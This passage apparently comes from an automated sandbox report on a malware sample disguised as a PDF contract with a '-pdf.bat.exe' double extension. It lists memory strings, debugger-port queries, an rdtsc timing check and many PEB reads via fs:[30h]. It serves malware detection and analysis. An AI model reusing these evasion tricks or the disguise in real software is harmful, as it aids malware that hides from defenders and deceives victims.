        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632177685.0000000002817000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002817000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111930720.000000000CD98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25107637245.0000000009395000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28289278020.0000000009395000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CD98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: ipconfig.exe, 00000004.00000002.25176930120.000000000309F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4914
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4909
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 rdtsc 2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00401774 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401774
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_701D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701D1BFF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8C2B0 mov ecx, dword ptr fs:[00000030h]2_2_32B8C2B0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C632C9 mov eax, dword ptr fs:[00000030h]2_2_32C632C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB42AF mov eax, dword ptr fs:[00000030h]2_2_32BB42AF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB42AF mov eax, dword ptr fs:[00000030h]2_2_32BB42AF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B892AF mov eax, dword ptr fs:[00000030h]2_2_32B892AF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B97290 mov eax, dword ptr fs:[00000030h]2_2_32B97290
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B97290 mov eax, dword ptr fs:[00000030h]2_2_32B97290
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B97290 mov eax, dword ptr fs:[00000030h]2_2_32B97290
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA02F9 mov eax, dword ptr fs:[00000030h]2_2_32BA02F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E289 mov eax, dword ptr fs:[00000030h]2_2_32C0E289
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D2EC mov eax, dword ptr fs:[00000030h]2_2_32B8D2EC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D2EC mov eax, dword ptr fs:[00000030h]2_2_32B8D2EC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B872E0 mov eax, dword ptr fs:[00000030h]2_2_32B872E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9A2E0 mov eax, dword ptr fs:[00000030h]2_2_32B9A2E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B982E0 mov eax, dword ptr fs:[00000030h]2_2_32B982E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B982E0 mov eax, dword ptr fs:[00000030h]2_2_32B982E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B982E0 mov eax, dword ptr fs:[00000030h]2_2_32B982E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B982E0 mov eax, dword ptr fs:[00000030h]2_2_32B982E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F2AE mov eax, dword ptr fs:[00000030h]2_2_32C4F2AE
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B2BC mov eax, dword ptr fs:[00000030h]2_2_32C6B2BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B2BC mov eax, dword ptr fs:[00000030h]2_2_32C6B2BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B2BC mov eax, dword ptr fs:[00000030h]2_2_32C6B2BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B2BC mov eax, dword ptr fs:[00000030h]2_2_32C6B2BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC32C0 mov eax, dword ptr fs:[00000030h]2_2_32BC32C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC32C0 mov eax, dword ptr fs:[00000030h]2_2_32BC32C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB32C5 mov eax, dword ptr fs:[00000030h]2_2_32BB32C5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F247 mov eax, dword ptr fs:[00000030h]2_2_32C4F247
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5124C mov eax, dword ptr fs:[00000030h]2_2_32C5124C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5124C mov eax, dword ptr fs:[00000030h]2_2_32C5124C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5124C mov eax, dword ptr fs:[00000030h]2_2_32C5124C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5124C mov eax, dword ptr fs:[00000030h]2_2_32C5124C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB0230 mov ecx, dword ptr fs:[00000030h]2_2_32BB0230
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA22B mov eax, dword ptr fs:[00000030h]2_2_32BCA22B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA22B mov eax, dword ptr fs:[00000030h]2_2_32BCA22B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA22B mov eax, dword ptr fs:[00000030h]2_2_32BCA22B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8821B mov eax, dword ptr fs:[00000030h]2_2_32B8821B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4D270 mov eax, dword ptr fs:[00000030h]2_2_32C4D270
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8A200 mov eax, dword ptr fs:[00000030h]2_2_32B8A200
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B273 mov eax, dword ptr fs:[00000030h]2_2_32B8B273
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B273 mov eax, dword ptr fs:[00000030h]2_2_32B8B273
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B273 mov eax, dword ptr fs:[00000030h]2_2_32B8B273
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1B214 mov eax, dword ptr fs:[00000030h]2_2_32C1B214
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1B214 mov eax, dword ptr fs:[00000030h]2_2_32C1B214
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C10227 mov eax, dword ptr fs:[00000030h]2_2_32C10227
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C10227 mov eax, dword ptr fs:[00000030h]2_2_32C10227
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C10227 mov eax, dword ptr fs:[00000030h]2_2_32C10227
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF24A mov eax, dword ptr fs:[00000030h]2_2_32BBF24A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C143D5 mov eax, dword ptr fs:[00000030h]2_2_32C143D5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B993A6 mov eax, dword ptr fs:[00000030h]2_2_32B993A6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B993A6 mov eax, dword ptr fs:[00000030h]2_2_32B993A6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91380 mov eax, dword ptr fs:[00000030h]2_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91380 mov eax, dword ptr fs:[00000030h]2_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91380 mov eax, dword ptr fs:[00000030h]2_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91380 mov eax, dword ptr fs:[00000030h]2_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B91380 mov eax, dword ptr fs:[00000030h]2_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF380 mov eax, dword ptr fs:[00000030h]2_2_32BAF380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F38A mov eax, dword ptr fs:[00000030h]2_2_32C4F38A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC33D0 mov eax, dword ptr fs:[00000030h]2_2_32BC33D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC43D0 mov ecx, dword ptr fs:[00000030h]2_2_32BC43D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0C3B0 mov eax, dword ptr fs:[00000030h]2_2_32C0C3B0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B963CB mov eax, dword ptr fs:[00000030h]2_2_32B963CB
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E3C0 mov eax, dword ptr fs:[00000030h]2_2_32B8E3C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E3C0 mov eax, dword ptr fs:[00000030h]2_2_32B8E3C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E3C0 mov eax, dword ptr fs:[00000030h]2_2_32B8E3C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8C3C7 mov eax, dword ptr fs:[00000030h]2_2_32B8C3C7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E328 mov eax, dword ptr fs:[00000030h]2_2_32B8E328
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E328 mov eax, dword ptr fs:[00000030h]2_2_32B8E328
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8E328 mov eax, dword ptr fs:[00000030h]2_2_32B8E328
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB332D mov eax, dword ptr fs:[00000030h]2_2_32BB332D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC8322 mov eax, dword ptr fs:[00000030h]2_2_32BC8322
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC8322 mov eax, dword ptr fs:[00000030h]2_2_32BC8322
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC8322 mov eax, dword ptr fs:[00000030h]2_2_32BC8322
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC631F mov eax, dword ptr fs:[00000030h]2_2_32BC631F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAE310 mov eax, dword ptr fs:[00000030h]2_2_32BAE310
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAE310 mov eax, dword ptr fs:[00000030h]2_2_32BAE310
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAE310 mov eax, dword ptr fs:[00000030h]2_2_32BAE310
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C10371 mov eax, dword ptr fs:[00000030h]2_2_32C10371
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C10371 mov eax, dword ptr fs:[00000030h]2_2_32C10371
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E372 mov eax, dword ptr fs:[00000030h]2_2_32C0E372
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E372 mov eax, dword ptr fs:[00000030h]2_2_32C0E372
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E372 mov eax, dword ptr fs:[00000030h]2_2_32C0E372
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E372 mov eax, dword ptr fs:[00000030h]2_2_32C0E372
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B89303 mov eax, dword ptr fs:[00000030h]2_2_32B89303
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B89303 mov eax, dword ptr fs:[00000030h]2_2_32B89303
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB237A mov eax, dword ptr fs:[00000030h]2_2_32BB237A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F30A mov eax, dword ptr fs:[00000030h]2_2_32C4F30A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9B360 mov eax, dword ptr fs:[00000030h]2_2_32B9B360
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE363 mov eax, dword ptr fs:[00000030h]2_2_32BCE363
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA350 mov eax, dword ptr fs:[00000030h]2_2_32BCA350
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C63336 mov eax, dword ptr fs:[00000030h]2_2_32C63336
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B88347 mov eax, dword ptr fs:[00000030h]2_2_32B88347
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B88347 mov eax, dword ptr fs:[00000030h]2_2_32B88347
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B88347 mov eax, dword ptr fs:[00000030h]2_2_32B88347
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD00A5 mov eax, dword ptr fs:[00000030h]2_2_32BD00A5
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8C090 mov eax, dword ptr fs:[00000030h]2_2_32B8C090
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8A093 mov ecx, dword ptr fs:[00000030h]2_2_32B8A093
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B890F8 mov eax, dword ptr fs:[00000030h]2_2_32B890F8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B890F8 mov eax, dword ptr fs:[00000030h]2_2_32B890F8
